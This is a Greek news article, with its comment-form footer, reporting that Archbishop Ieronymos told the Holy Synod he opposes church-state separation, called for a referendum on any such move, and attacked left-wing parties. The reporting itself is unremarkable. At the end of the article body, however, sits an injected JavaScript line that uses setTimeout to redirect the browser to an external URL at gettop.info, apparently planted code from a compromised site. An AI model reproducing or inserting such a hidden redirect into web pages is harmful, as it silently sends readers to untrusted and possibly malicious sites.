Πρόταση για δημοψήφισμα από τον Αρχιεπίσκοπο: Η Εκκλησία ήταν και θα είναι η μάνα του λαού

1
12

 

Απευθυνόμενος στην Ιερά Σύνοδο της Ιεραρχίας της Εκκλησίας, ο Αρχιεπίσκοπος Αθηνών και πάσης Ελλάδος Ιερώνυμος θέλησε να ξεκαθαρίσει οριστικά το θέμα με τις σχέσεις Εκκλησίας με την Πολιτεία και τάχθηκε σαφως εναντίον του διαχωρισμου, καλώντας μάλιστα την κυβέρνηση αν επιδιώξει να διαχωρίσει Εκκλησία και κράτος θα πρέπει να πάρει την έγκριση του λαού με ένα δημοψήφισμα.

Ο κκ. Ιερώνυμος διεμήνυσε ότι ακόμη κι αν επιχειρήσει αυτόν τον διαχωρισμό η κυβέρνηση θα πρέπει να τηρήσει τις υποχρεώσεις που έχει αναλάβει η Πολιτεία έναντι της Εκκλησίας και τις σχετικές συμβάσεις.

Το μήνυμα που έστελε ο Αρχιεπίσκοπος ήταν σαφές: «Η Εκκλησία υπήρξε, είναι και θα υπάρχει μάνα αυτού του λαού με ό,τι αυτό σημαίνει. Η Πολιτεία, αν το θελήσει, και έχει τη συγκατάθεση του λαού, ας επιχειρήσει τον χωρισμό, τηρώντας απαρέγκλιτα τις υποχρεώσεις που έχει αναλάβει απέναντι στην Εκκλησία και τις σχετικές συμβάσεις».

Στην εισήγησή του (82 σελίδων) προς το σώμα της Ιεραρχίας ανέλυσε ζητήματα, όπως οι σχέσεις της Εκκλησίας με την Πολιτεία και ο διαχωρισμός, η εκκλησιαστική περιουσία αλλά και το μάθημα των Θρησκευτικών, ενώ γενικώς το κλίμα ήταν διακείμενο αρνητικό κατά της κυβέρνησης.

Ο Αρχιεπίσκοπος άφησε αιχμές κατά όλων όσοι επιχειρούν «με λόγους στηριγμένους σε μυθεύματα και μυθοπλασίες, που τους ανέθρεψαν κατά το παρελθόν, να θέσουν την Εκκλησία στο περιθώριο της ιστορίας και της σύγχρονης ζωής».

Μάλιστα, «δανείστηκε» όπως ο ίδιος είπε «τις σκέψεις του αγαπητού αδελφού, σεβασμιωτάτου μητροπολίτου Πειραιώς κ. Σεραφείμ», για να εκφράσει τις απόψεις του κατά της αριστερής κυβέρνησης: «Τα κόμματα της Αριστεράς με τη γνωστή φιλοσοφικο-κοινωνική βιοκοσμοθεωρία του κομμουνιστικού κοσμοειδώλου, όπως γνώρισε τον χωρισμό αυτό ο καταρρεύσας υπαρκτός σοσιαλισμός στο ανατολικό μπλοκ, που στην ουσία ήταν ο διωγμός της θρησκευτικής πίστεως, ελαύνονται από αποτυχημένα αθεϊστικά ιδεολογήματα και συναντώνται με τα υπόλοιπα κόμματα του νεοφιλελεύθερου χώρου κάτω από τις ντιρεκτίβες της νέας εποχής και της νέας τάξεως». Και προσέθεσε: «Τα κόμματα της Αριστεράς επικαλούνται δήθεν προοδευτικά συνθήματα. Οι αντιλήψεις, όμως, περί χωρισμού είναι του περασμένου αιώνα που γεννήθηκαν κάτω από μισαλλόδοξο αντιθρησκευτικό και αντικληρικαλιστικό λαϊκιστικό πνεύμα που δεν συμβιβάζεται με τις σημερινές πολιτειακές και θρησκευτικές αντιλήψεις». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

1 ΣΧΟΛΙΟ

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here